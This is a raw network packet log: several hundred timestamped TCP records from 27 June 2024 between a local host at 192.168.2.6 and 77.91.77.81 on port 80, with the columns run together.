                                                                Jun 27, 2024 05:59:05.574033976 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574050903 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574059010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574104071 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574157000 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574280977 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574295044 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574316025 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574333906 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574342966 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574342966 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574361086 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574413061 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574459076 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574480057 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574495077 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574505091 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574522018 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574528933 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574537992 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574563980 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574577093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574590921 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574604988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574624062 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574630022 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574644089 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574671030 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574680090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574693918 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574707985 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.574718952 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574739933 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.574759007 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575154066 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575167894 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575181961 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575201988 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575221062 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575232983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575248003 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575268030 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575282097 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575294971 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575310946 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575318098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575331926 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575342894 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575356007 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575366020 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575377941 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575387001 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575400114 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575414896 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575423956 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575452089 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575661898 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575676918 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575696945 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575711012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575721979 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575736046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575750113 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575767994 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575773954 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575795889 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575803041 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575818062 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575828075 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575840950 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575850010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575865984 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575872898 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575884104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575895071 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575902939 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575916052 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575930119 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575939894 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575956106 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575963020 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575973988 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.575984001 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.575993061 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.576014042 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576046944 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.576056957 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.576669931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576688051 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576700926 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576714993 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576724052 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.576735973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576745987 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.576759100 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576771021 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.576781034 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576788902 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576796055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576809883 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576822996 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576832056 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.576844931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.576853991 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.576886892 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577301025 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577315092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577327967 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577342033 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577352047 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577364922 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577375889 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577388048 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577402115 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577411890 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577424049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577433109 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577445984 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577455044 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577466965 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577476978 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577490091 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577497959 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577507019 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577518940 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577536106 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577542067 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577553988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577564001 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577578068 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577586889 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577599049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577608109 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577624083 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.577630997 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577651024 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.577671051 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578176022 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578191042 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578203917 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578218937 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578228951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578239918 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578248978 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578260899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578274965 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578284979 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578296900 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578314066 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578325033 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578336954 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578346014 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578357935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578372002 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578381062 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578394890 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578402996 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.578413010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.578438044 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.592840910 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.592895031 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.592910051 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.592920065 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.592941999 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.592967033 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.592978001 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.593018055 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.593044996 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.593059063 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.593080997 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.593101025 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.593126059 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.593168974 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656167030 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656192064 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656205893 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656296015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656327963 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656342983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656352043 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656366110 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656392097 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656420946 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656449080 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656501055 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656550884 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656564951 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656579018 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656594038 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656603098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656620979 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656635046 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656655073 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656683922 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656774998 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656790018 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.656821012 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.656842947 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664127111 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664170027 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664184093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664191961 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664216042 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664239883 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664335966 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664349079 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664364100 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664378881 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664386988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664405107 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664412022 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664436102 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664464951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664583921 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664597988 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664612055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664630890 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664657116 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664707899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664721966 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664736032 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664747953 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664757013 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664782047 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664809942 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664836884 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664887905 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.664952040 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664967060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664979935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.664998055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665004969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665019035 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665025949 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665040970 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665050983 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665064096 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665085077 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665112019 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665287018 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665301085 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665314913 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665328979 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665338993 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665359020 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665383101 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665467978 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665481091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665496111 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665509939 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665518999 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665556908 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665721893 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665736914 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665750980 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665766954 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665774107 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665787935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665796041 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665810108 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.665829897 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.665849924 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666033030 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666047096 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666081905 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666096926 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666141987 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666157007 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666171074 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666184902 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666193962 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666208982 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666222095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666240931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666246891 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666260004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666268110 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666280985 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666290045 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666301966 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666311979 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666325092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666332960 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666353941 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666373014 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666675091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666687965 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666702032 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666714907 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666723013 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666753054 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666759968 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666774035 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666788101 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666798115 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666810036 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666824102 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666832924 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666845083 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666862011 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666867971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666879892 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666884899 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666898012 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666912079 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666925907 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666935921 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666948080 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.666958094 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666973114 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.666985035 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667000055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667009115 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667027950 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667047977 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667665005 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667678118 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667690992 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667717934 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667725086 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667737007 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667746067 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667758942 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667771101 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667777061 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667788982 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667802095 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667809963 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667821884 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667830944 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667841911 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667855024 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667864084 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667876005 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667890072 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667897940 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667910099 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667920113 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667932034 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667944908 CEST804972977.91.77.81192.168.2.6
